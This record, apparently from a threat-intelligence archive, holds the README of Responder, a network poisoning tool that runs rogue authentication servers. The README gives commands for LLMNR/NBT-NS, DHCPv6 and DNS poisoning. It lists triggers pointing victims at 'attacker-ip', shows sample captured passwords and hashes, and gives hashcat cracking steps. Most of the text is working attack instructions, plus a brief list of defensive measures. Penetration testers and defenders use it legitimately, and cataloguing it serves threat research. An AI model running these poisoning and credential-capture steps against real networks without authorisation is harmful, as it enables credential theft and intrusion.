{
	"id": "f430fc96-d142-4e30-8613-79f5a0e5a630",
	"created_at": "2026-04-06T00:09:18.467274Z",
	"updated_at": "2026-04-10T13:11:54.353624Z",
	"deleted_at": null,
	"sha1_hash": "70639b4e53ed2d884925e288071ea6991b2acd86",
	"title": "GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 189036,
	"plain_text": "GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and\r\nMDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP\r\nrogue authentication server supporting NTLMv1/NTLMv2/LMv2,\r\nExtended Security NTLMSSP and Basic HTTP authentication.\r\nBy lgandx\r\nArchived: 2026-04-05 21:12:05 UTC\r\nppyytthhoonn 22..77 || 33..xx\r\n lliicceennssee GGPPLL vv33\r\nResponder is a LLMNR, NBT-NS, and MDNS poisoner with built-in rogue authentication servers for HTTP,\r\nSMB, MSSQL, FTP, LDAP, Kerberos, DNS, and more. It supports NTLMv1/NTLMv2/LMv2, Extended Security\r\nNTLMSSP, and various authentication methods across 15+ protocols.\r\nTable of Contents\r\nOverview\r\nWhat's New\r\nInstallation\r\nQuick Start\r\nNetwork Poisoning\r\nRogue Servers\r\nConfiguration\r\nTroubleshooting\r\nOverview\r\nResponder captures credentials by responding to LLMNR, NBT-NS, and MDNS name resolution requests. When\r\na client attempts to resolve a non-existent hostname, Responder answers, directing the client to the attacker's\r\nmachine where multiple rogue authentication servers capture credentials. 
DHCP, DHCPv6 rogue servers are also\r\nincluded and can be enabled separately.\r\nCaptured Data:\r\nNetNTLMv1/v2 hashes - Crackable with hashcat/john\r\nKerberos AS-REQ hashes - Offline cracking (hashcat -m 7500)\r\nCleartext credentials - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.\r\nChallenge-response - CRAM-MD5, DIGEST-MD5\r\nhttps://github.com/lgandx/Responder\r\nPage 1 of 23\n\nWhat's New\r\nThis version includes:\r\nDHCPv6 \u0026 DNS Enhancements\r\n✅ DHCPv6 INFORMATION-REQUEST - Full Windows 10/11 compatibility\r\n✅ Domain Filtering - Target specific domains (DHCPv6 \u0026 DNS)\r\n✅ Router Advertisements - Optional IPv6 network poisoning\r\nEmail Server Upgrades\r\n✅ SMTP STARTTLS - Capture from modern email clients\r\n✅ IMAP STARTTLS - Port 143 with TLS upgrade\r\n✅ IMAPS - Native SSL on port 993\r\n✅ Enhanced POP3 - Better compatibility\r\nKerberos Improvements\r\n✅ Force AS-REQ - Force kerberos authentication.\r\n✅ Attempt NTLM Fallback - After grabbing kerberos auth, return KDC_ERR_ETYPE_NOSUPP\r\nProtocol Enhancements\r\n✅ MSSQL - SQL Server authentication capture\r\n✅ LDAP/LDAPS - Directory service credentials\r\n✅ RDP - Remote Desktop authentication\r\n✅ WinRM - Windows Remote Management\r\n✅ DCERPC - Windows RPC authentication\r\nInstallation\r\nRequirements\r\nPython 2.7 or Python 3.x\r\nLinux (Ubuntu, Kali, Debian recommended)\r\nRoot privileges\r\nSystem Dependencies\r\nsudo apt-get update\r\nsudo apt-get install python3 python3-pip python3-netifaces\r\nInstall Responder\r\ngit clone https://github.com/lgandx/Responder.git\r\ncd Responder\r\npip3 install -r requirements.txt\r\nVerify Installation\r\nsudo python3 Responder.py --help\r\nQuick Start\r\nBasic Poisoning\r\n# Standard LLMNR/NBT-NS poisoning\r\nsudo python3 Responder.py -I eth0 -v\r\n# Analyze mode (passive monitoring)\r\nsudo python3 Responder.py -I eth0 -A -v\r\nDHCPv6 Attack\r\n# Edit Responder.conf first:\r\n# [DHCPv6 
Server]\r\n# DHCPv6_Domain = corp.local\r\nsudo python3 Responder.py -I eth0 --dhcpv6 -v\r\nForce HTTP Basic Auth\r\nsudo python3 Responder.py -I eth0 -b -v\r\nEnable Proxy Auth + Rogue DHCP\r\n# Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)\r\nsudo python3 Responder.py -I eth0 -Pvd\r\nNetwork Poisoning\r\nLLMNR/NBT-NS/MDNS Poisoning\r\nPurpose: Respond to name resolution failures\r\nHow it works:\r\n1. Client broadcasts query for non-existent host\r\n2. Responder answers: \"I'm that host\"\r\n3. Client connects to attacker\r\n4. Credentials captured\r\nConfiguration:\r\n[Responder Core]\r\nLLMNR = On\r\nNBTNS = On\r\nMDNS = On\r\nUsage:\r\nsudo python3 Responder.py -I eth0 -v\r\nDHCPv6 Server\r\nPurpose: Force clients to use attacker's DNS via IPv6\r\nFeatures:\r\n✅ INFORMATION-REQUEST support (Windows 10/11)\r\n✅ SOLICIT/REQUEST support\r\n✅ Domain filtering (surgical targeting)\r\n✅ Router Advertisement (optional)\r\nHow it works:\r\n1. Windows sends DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST\r\n2. Responder responds: DNS = attacker IPv6\r\n3. Windows prioritizes IPv6 DNS\r\n4. All DNS queries → attacker\r\n5. 
DNS poisoning → credential capture\r\nConfiguration:\r\n[DHCPv6 Server]\r\n; Only respond to specific domain\r\nDHCPv6_Domain = corp.local\r\n; Send Router Advertisements\r\nSendRA = Off\r\n; IPv6 address to advertise\r\nBindToIPv6 = fe80::1\r\nUsage:\r\nsudo python3 Responder.py -I eth0 --dhcpv6 -v\r\nExpected Output:\r\n[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4\r\n[DHCPv6] Client domain: workstation.corp.local\r\n[DHCPv6] Matched target domain: corp.local\r\n[DHCPv6] Responding with DNS: fe80::1\r\n[DNS] Query: mail.corp.local (A)\r\n[DNS] Poisoned: mail.corp.local -\u003e 192.168.1.100\r\n[SMTP] Captured: user@corp.local:Password123\r\nRogue Servers\r\nResponder includes 17+ rogue authentication servers:\r\nFile \u0026 Network Services\r\nSMB Server (Ports 445, 139)\r\nPurpose: Capture NetNTLM hashes from file shares\r\nFeatures:\r\n✅ SMBv1/SMBv2/SMBv3\r\n✅ NetNTLMv1/v2 hash capture\r\n✅ Extended Security NTLMSSP\r\n✅ Session signing disabled (allows relay)\r\nTriggers:\r\n# UNC paths\r\n\\\\attacker-ip\\share\r\n\\\\non-existent-server\\files\r\n# NET USE commands\r\nnet use \\\\attacker-ip\\share\r\n# Windows Explorer address bar\r\n\\\\attacker-ip\\\r\nCaptured Format:\r\nusername::domain:challenge:response:blob\r\nCracking:\r\nhashcat -m 5600 smb-ntlmv2.txt wordlist.txt\r\nConfiguration:\r\n[Responder Core]\r\nSMB = On\r\nFTP Server (Port 21)\r\nPurpose: Capture cleartext FTP credentials\r\nFeatures:\r\n✅ Anonymous login honeypot\r\n✅ USER/PASS authentication\r\n✅ Cleartext credential capture\r\nTriggers:\r\nftp attacker-ip\r\n# Username: anything\r\n# Password: anything\r\nCaptured Format:\r\n[FTP] Cleartext: username:password\r\nConfiguration:\r\n[Responder Core]\r\nFTP = On\r\nDatabase Servers\r\nMSSQL Server (Port 1433)\r\nPurpose: Capture Microsoft SQL Server 
authentication\r\nFeatures:\r\n✅ SQL Server authentication\r\n✅ Windows authentication (NTLM)\r\n✅ Cleartext SQL credentials\r\n✅ NetNTLMv2 hash capture\r\nTriggers:\r\n-- SQL Server Management Studio\r\nServer: attacker-ip\r\nAuthentication: SQL Server / Windows\r\n-- Command line\r\nsqlcmd -S attacker-ip -U sa -P password\r\n-- Connection strings\r\nServer=attacker-ip;Database=master;User Id=sa;Password=pass;\r\nCaptured Formats:\r\n[MSSQL] SQL Auth: sa:password123\r\n[MSSQL] NetNTLMv2: DOMAIN\\user::domain:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nSQL = On\r\nNotes:\r\nCaptures both SQL authentication and Windows authentication\r\nWorks with SSMS, sqlcmd, ADO.NET connections\r\nCan capture domain credentials via Windows auth\r\nEmail Servers\r\nSMTP Server (Port 25, 587)\r\nPurpose: Capture email client authentication\r\nFeatures:\r\n✅ STARTTLS support (modern clients)\r\n✅ AUTH PLAIN (cleartext)\r\n✅ AUTH LOGIN (cleartext)\r\n✅ AUTH CRAM-MD5\r\n✅ AUTH DIGEST-MD5\r\n✅ AUTH NTLM (NetNTLMv2)\r\nSTARTTLS Flow:\r\nClient → EHLO\r\nServer → 250-STARTTLS\r\nClient → STARTTLS\r\nServer → 220 Ready to start TLS\r\n[TLS handshake using self-signed cert]\r\nClient → AUTH PLAIN \u003ccredentials\u003e\r\nServer → Captured! ✅\r\nTriggers:\r\nEmail client configuration:\r\n- Server: attacker-ip\r\n- Port: 25 or 587\r\n- Security: STARTTLS or None\r\n- Username: anything\r\n- Password: anything\r\nCaptured Formats:\r\n[SMTP] LOGIN: user@company.com:Password123\r\n[SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\n[SMTP] CRAM-MD5: user:challenge:response\r\nConfiguration:\r\n[Responder Core]\r\nSMTP = On\r\nCertificate Warnings: Self-signed cert warnings are normal. 
Clients reject first attempt, retry, and succeed.\r\nCredentials still captured.\r\nIMAP Server (Port 143)\r\nPurpose: Capture IMAP authentication with STARTTLS\r\nFeatures:\r\n✅ STARTTLS support\r\n✅ LOGIN command (cleartext)\r\n✅ AUTHENTICATE PLAIN\r\n✅ AUTHENTICATE LOGIN\r\n✅ AUTHENTICATE NTLM\r\nSTARTTLS Flow:\r\nClient → CAPABILITY\r\nServer → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS\r\nClient → STARTTLS\r\nServer → OK Begin TLS negotiation now\r\n[TLS upgrade]\r\nClient → LOGIN user password\r\nServer → Captured! ✅\r\nConfiguration:\r\n[Responder Core]\r\nIMAP = On\r\nIMAPS Server (Port 993)\r\nPurpose: IMAP over SSL (native encryption)\r\nFeatures:\r\n✅ Native SSL from connection start\r\n✅ All IMAP authentication methods\r\n✅ No STARTTLS needed (already encrypted)\r\nHow it differs from IMAP:\r\nPort 143 (IMAP): Plain → STARTTLS → Encrypted\r\nPort 993 (IMAPS): Encrypted from start\r\nConfiguration:\r\n[Responder Core]\r\nIMAPS = On\r\nPOP3 Server (Port 110)\r\nPurpose: Capture POP3 email retrieval credentials\r\nFeatures:\r\n✅ USER/PASS authentication\r\n✅ APOP (MD5 challenge)\r\n✅ Cleartext credential capture\r\nTriggers:\r\nEmail client:\r\n- Protocol: POP3\r\n- Server: attacker-ip\r\n- Port: 110\r\nCaptured Format:\r\n[POP3] USER: username\r\n[POP3] PASS: password\r\nConfiguration:\r\n[Responder Core]\r\nPOP = On\r\nWeb Servers\r\nHTTP Server (Port 80)\r\nPurpose: Capture web authentication\r\nFeatures:\r\n✅ NTLM authentication (NetNTLMv1/v2)\r\n✅ Basic authentication (cleartext)\r\n✅ Digest authentication (MD5)\r\n✅ WPAD injection\r\nTriggers:\r\nBrowser: http://attacker-ip/\r\nUNC: file://attacker-ip/share\r\nWPAD: Automatic proxy detection\r\nForce Basic Auth:\r\nsudo python3 Responder.py -I eth0 -b\r\nCaptured Formats:\r\n[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob\r\n[HTTP] Basic: user:password\r\n[HTTP] Digest: 
user:realm:hash\r\nConfiguration:\r\n[Responder Core]\r\nHTTP = On\r\nHTTPS Server (Port 443)\r\nPurpose: HTTPS with authentication capture\r\nFeatures:\r\n✅ SSL/TLS encryption\r\n✅ All HTTP authentication methods\r\n✅ Self-signed certificate\r\n✅ WPAD over HTTPS\r\nConfiguration:\r\n[Responder Core]\r\nHTTPS = On\r\nSSLCert = certs/responder.crt\r\nSSLKey = certs/responder.key\r\nDirectory \u0026 Authentication\r\nKerberos Server (Port 88)\r\nPurpose: Capture AS-REP hashes for offline cracking\r\nFeatures:\r\n✅ AES256-CTS-HMAC-SHA1-96 (etype 18)\r\n✅ AES128-CTS-HMAC-SHA1-96 (etype 17)\r\n✅ ARCFOUR-HMAC-MD5 (etype 23)\r\nHow it works:\r\n1. Client sends AS-REQ (TGT request)\r\n2. Responder: \"Pre-authentication required\"\r\n3. Client sends AS-REQ with encrypted timestamp\r\n4. Responder captures encrypted timestamp\r\n5. Crack offline with hashcat\r\nCracking:\r\nhashcat -m 7500 kerberos-asreq.txt wordlist.txt\r\nConfiguration:\r\n[Responder Core]\r\nKerberos = On\r\nLDAP Server (Port 389)\r\nPurpose: Capture LDAP directory authentication\r\nFeatures:\r\n✅ Simple authentication (cleartext)\r\n✅ NTLM authentication\r\n✅ Active Directory queries\r\nTriggers:\r\n# LDAP query\r\nldapsearch -H ldap://attacker-ip -D \"CN=user,DC=corp,DC=local\" -w password\r\n# Active Directory tools\r\ndsquery user -d attacker-ip\r\nCaptured Formats:\r\n[LDAP] Simple: CN=user,DC=corp,DC=local:password\r\n[LDAP] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nLDAP = On\r\nLDAPS Server (Port 636)\r\nPurpose: LDAP over SSL\r\nFeatures:\r\n✅ SSL/TLS encryption\r\n✅ All LDAP authentication methods\r\nConfiguration:\r\n[Responder Core]\r\nLDAP = On\r\nRemote Access\r\nRDP Server (Port 3389)\r\nPurpose: Capture Remote Desktop authentication\r\nFeatures:\r\n✅ Network Level Authentication (NLA)\r\n✅ NetNTLMv2 hash capture\r\n✅ CredSSP 
authentication\r\nTriggers:\r\nRemote Desktop Client:\r\n- Computer: attacker-ip\r\n- Username: anything\r\n- Password: anything\r\nCaptured Format:\r\n[RDP] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nRDP = On\r\nNote: Captures NLA authentication before desktop session.\r\nWinRM Server (Ports 5985, 5986)\r\nPurpose: Capture Windows Remote Management credentials\r\nFeatures:\r\n✅ HTTP (5985) and HTTPS (5986)\r\n✅ Basic authentication\r\n✅ NTLM authentication\r\n✅ Kerberos authentication\r\nTriggers:\r\n# PowerShell remoting\r\nEnter-PSSession -ComputerName attacker-ip\r\nInvoke-Command -ComputerName attacker-ip -ScriptBlock { whoami }\r\n# WinRM command line\r\nwinrm invoke -remote:http://attacker-ip\r\nCaptured Formats:\r\n[WinRM] Basic: DOMAIN\\user:password\r\n[WinRM] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nWINRM = On\r\nInfrastructure\r\nDNS Server (Port 53 TCP/UDP)\r\nPurpose: Rogue DNS with domain filtering\r\nFeatures:\r\n✅ A/AAAA record poisoning\r\n✅ MX record poisoning (email redirection)\r\n✅ SOA records (appear authoritative)\r\n✅ SRV records (Kerberos, LDAP)\r\n✅ SVCB/HTTPS records (modern browsers)\r\n✅ EDNS0 support\r\n✅ Domain filtering\r\nConfiguration:\r\n[DHCPv6 Server]\r\n; DNS uses same domain filter as DHCPv6\r\nDHCPv6_Domain = corp.local\r\nHow it works:\r\nQuery: mail.corp.local\r\nResponse: 192.168.1.100 (attacker)\r\nClient connects to attacker's SMTP\r\nCredentials captured!\r\nSupported Record Types:\r\nA (IPv4) - Redirect to attacker\r\nAAAA (IPv6) - Redirect to attacker\r\nMX (Mail) - Email server poisoning\r\nSRV (Services) - Kerberos, LDAP, etc.\r\nSOA (Authority) - Appear as authoritative\r\nTXT (Text) - SPF records\r\nSVCB/HTTPS (Service Binding) - Modern browsers\r\nDomain Filtering 
Example:\r\nDHCPv6_Domain = corp.local\r\nmail.corp.local → POISONED ✅\r\ndc01.corp.local → POISONED ✅\r\ngoogle.com → IGNORED (normal DNS)\r\nConfiguration:\r\n[Responder Core]\r\nDNS = On\r\nDCERPC Server (Port 135)\r\nPurpose: Capture Windows RPC authentication\r\nFeatures:\r\n✅ NTLM authentication\r\n✅ Windows service enumeration\r\n✅ NetNTLMv2 capture\r\nTriggers:\r\nWindows services querying RPC endpoint mapper\r\nWMI queries\r\nRemote registry access\r\nCaptured Format:\r\n[DCERPC] NetNTLMv2: user::DOMAIN:challenge:response:blob\r\nConfiguration:\r\n[Responder Core]\r\nDCERPC = On\r\nConfiguration\r\nMain Configuration File\r\nEdit Responder.conf :\r\n[Responder Core]\r\n; === Network Services ===\r\nSQL = On # MSSQL (port 1433)\r\nSMB = On # SMB (ports 445, 139)\r\nRDP = On # Remote Desktop (port 3389)\r\nKerberos = On # Kerberos (port 88)\r\nFTP = On # FTP (port 21)\r\nPOP = On # POP3 (port 110)\r\nSMTP = On # SMTP with STARTTLS (port 25/587)\r\nIMAP = On # IMAP with STARTTLS (port 143)\r\nIMAPS = On # IMAPS with SSL (port 993)\r\nHTTP = On # HTTP (port 80)\r\nHTTPS = On # HTTPS (port 443)\r\nDNS = On # DNS (port 53)\r\nLDAP = On # LDAP/LDAPS (ports 389/636)\r\nDCERPC = On # Windows RPC (port 135)\r\nWINRM = On # Windows Remote Management (ports 5985/5986)\r\n; === Poisoners ===\r\nLLMNR = On # Link-Local Multicast Name Resolution\r\nNBTNS = On # NetBIOS Name Service\r\nMDNS = On # Multicast DNS\r\nDHCP = Off # DHCP (IPv4) - use with caution\r\nDHCPv6 = On # DHCPv6 (IPv6) - use with more caution\r\n; === Settings ===\r\nSessionLog = On\r\nLogToFile = On\r\nVerbose = Yes\r\nDatabase = Responder.db\r\n; === SSL Certificates ===\r\nSSLCert = certs/responder.crt\r\nSSLKey = certs/responder.key\r\n[HTTP Server]\r\nHtmlFilename = files/AccessDenied.html\r\n[DHCPv6 Server]\r\n; Target specific domain\r\nDHCPv6_Domain = corp.local\r\n; Send Router 
Advertisements (use with caution)\r\nSendRA = Off\r\n; IPv6 address to advertise\r\nBindToIPv6 = fe80::1\r\nCommand-Line Options\r\nBasic Usage\r\nsudo python3 Responder.py [options]\r\nRequired Arguments\r\nOption Description\r\n-I eth0, --interface=eth0 Network interface to use (use 'ALL' for all interfaces)\r\nPoisoning Options\r\nOption Description\r\n-A, --analyze Analyze mode - See NBT-NS, MDNS, LLMNR requests without responding\r\n-w, --wpad Start WPAD rogue proxy server (default: Off)\r\n-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat retrieval (old networks)\r\n-P, --ProxyAuth Force NTLM/Basic authentication for proxy (highly effective)\r\nDHCP/DHCPv6 Options\r\nOption Description\r\n-d, --DHCP Enable DHCP broadcast responses with WPAD injection (IPv4)\r\n-D, --DHCP-DNS Inject DNS server in DHCP response instead of WPAD\r\n--dhcpv6 Enable DHCPv6 poisoning (responds to SOLICIT messages)\r\nIP poisoning Options\r\nOption Description\r\n-e 10.0.0.22, --externalip=10.0.0.22 Poison requests with another IPv4 address\r\n-6 ADDR, --externalip6=ADDR Poison requests with another IPv6 address\r\n-i 10.0.0.21, --ip=10.0.0.21 Local IP to use (OSX only)\r\nAuthentication Options\r\nOption Description\r\n-b, --basic Return HTTP Basic authentication (default: NTLM)\r\n--lm Force LM hashing downgrade (Windows XP/2003)\r\n--disable-ess Force Extended Security NTLMSSP downgrade\r\nAdvanced Options\r\nOption Description\r\n-u HOST:PORT, --upstream-proxy=HOST:PORT\r\nUpstream HTTP proxy for rogue WPAD\r\n-t 1e, --ttl=1e\r\nChange Windows TTL for poisoned answers (hex: 30s=1e, or\r\n'random')\r\n-N NAME, --AnswerName=NAME\r\nCanonical name for LLMNR answers (useful for Kerberos\r\nrelay)\r\n-E, --ErrorCode\r\nReturn STATUS_LOGON_FAILURE (enables WebDAV auth\r\ncapture)\r\nOutput Options\r\nOption Description\r\n-v, --verbose Increase verbosity 
(recommended)\r\n-Q, --quiet Quiet mode - Disable poisoner output\r\nInformation\r\nOption Description\r\n--version Show program version and exit\r\n-h, --help Show help message and exit\r\nStorage Locations\r\nResponder.db # SQLite database\r\nlogs/\r\n├── HTTP-NTLMv2-\u003cIP\u003e.txt # HTTP NetNTLMv2 hashes\r\n├── SMB-NTLMv2-\u003cIP\u003e.txt # SMB NetNTLMv2 hashes\r\n├── MSSQL-NTLMv2-\u003cIP\u003e.txt # MSSQL NetNTLMv2 hashes\r\n├── Kerberos-AES-\u003cIP\u003e.txt # Kerberos AS-REP hashes\r\n├── SMTP-Cleartext-\u003cIP\u003e.txt # SMTP cleartext credentials\r\n├── IMAP-NTLMv2-\u003cIP\u003e.txt # IMAP NetNTLMv2 hashes\r\n├── FTP-Cleartext-\u003cIP\u003e.txt # FTP cleartext credentials\r\n├── LDAP-Cleartext-\u003cIP\u003e.txt # LDAP cleartext credentials\r\n├── RDP-NTLMv2-\u003cIP\u003e.txt # RDP NetNTLMv2 hashes\r\n└── WinRM-NTLMv2-\u003cIP\u003e.txt # WinRM NetNTLMv2 hashes\r\nDatabase Query\r\nsqlite3 Responder.db\r\n# Show tables\r\n.tables\r\n# Show all captured hashes\r\nSELECT * FROM hashes;\r\n# Export to CSV\r\n.mode csv\r\n.output hashes.csv\r\nSELECT * FROM hashes;\r\n.quit\r\nOpSec Considerations\r\nDetection Indicators:\r\nUnusual LLMNR/NBT-NS responses\r\nRogue DHCP/DHCPv6 server\r\nInvalid Kerberos pre-auth requests\r\nSelf-signed SSL certificates\r\nMultiple authentication failures\r\nSuspicious DNS responses\r\nDefensive Measures:\r\nDisable MDNS/LLMNR/NBT-NS via GPO\r\nEnable DHCP snooping on the switch\r\nEnable IPv6 RA guard\r\nEnable DHCPv6 guard\r\nMonitor for rogue DHCPv6 servers\r\nTroubleshooting\r\nCommon Issues\r\nPermission Denied:\r\nsudo python3 Responder.py -I eth0\r\nInterface Not Found:\r\nip link show\r\nsudo python3 Responder.py -I wlan0\r\nPort Already in Use:\r\nsudo netstat -tulpn | grep 445\r\nsudo systemctl stop smbd nmbd\r\nDHCPv6 Not Working:\r\n# Enable IPv6\r\nsudo sysctl -w 
net.ipv6.conf.all.disable_ipv6=0\r\n# Verify\r\nsysctl net.ipv6.conf.all.disable_ipv6\r\nNo Hashes Captured:\r\n# Verify servers running\r\nsudo python3 Responder.py -I eth0 -v\r\n# Check firewall\r\nsudo iptables -L\r\n# Monitor traffic\r\nsudo tcpdump -i eth0 port 445 or port 88 or port 389\r\nDebug Mode\r\n# Very verbose output\r\nsudo python3 Responder.py -I eth0 -vv\r\n# Tail logs\r\ntail -f logs/Responder-Session.log\r\n# Network monitoring\r\nsudo tcpdump -i eth0 -w responder-capture.pcap\r\nCredits\r\nAuthor: Laurent Gaffié\r\nGitHub: https://github.com/lgandx\r\nWebsite: https://secorizon.com/\r\nTwitter: @secorizon\r\nDonation\r\nYou can contribute to this project by donating to the following USDT or Bitcoin address:\r\nUSDT: 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A\r\nBTC: bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49\r\nPaypal:\r\nhttps://paypal.me/PythonResponder\r\nAcknowledgments\r\nLate Responder development has been possible because of the donations received from individuals and\r\ncompanies.\r\nWe would like to thank those major sponsors:\r\nSecureWorks: https://www.secureworks.com/\r\nSynacktiv: https://www.synacktiv.com/\r\nBlack Hills Information Security: http://www.blackhillsinfosec.com/\r\nTrustedSec: https://www.trustedsec.com/\r\nRed Siege Information Security: https://www.redsiege.com/\r\nOpen-Sec: http://www.open-sec.com/\r\nAnd all, ALL the pentesters around the world who donated to this project.\r\nThank you.\r\nSource: https://github.com/lgandx/Responder",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/lgandx/Responder"
	],
	"report_names": [
		"Responder"
	],
	"threat_actors": [],
	"ts_created_at": 1775434158,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/70639b4e53ed2d884925e288071ea6991b2acd86.pdf",
		"text": "https://archive.orkl.eu/70639b4e53ed2d884925e288071ea6991b2acd86.txt",
		"img": "https://archive.orkl.eu/70639b4e53ed2d884925e288071ea6991b2acd86.jpg"
	}
}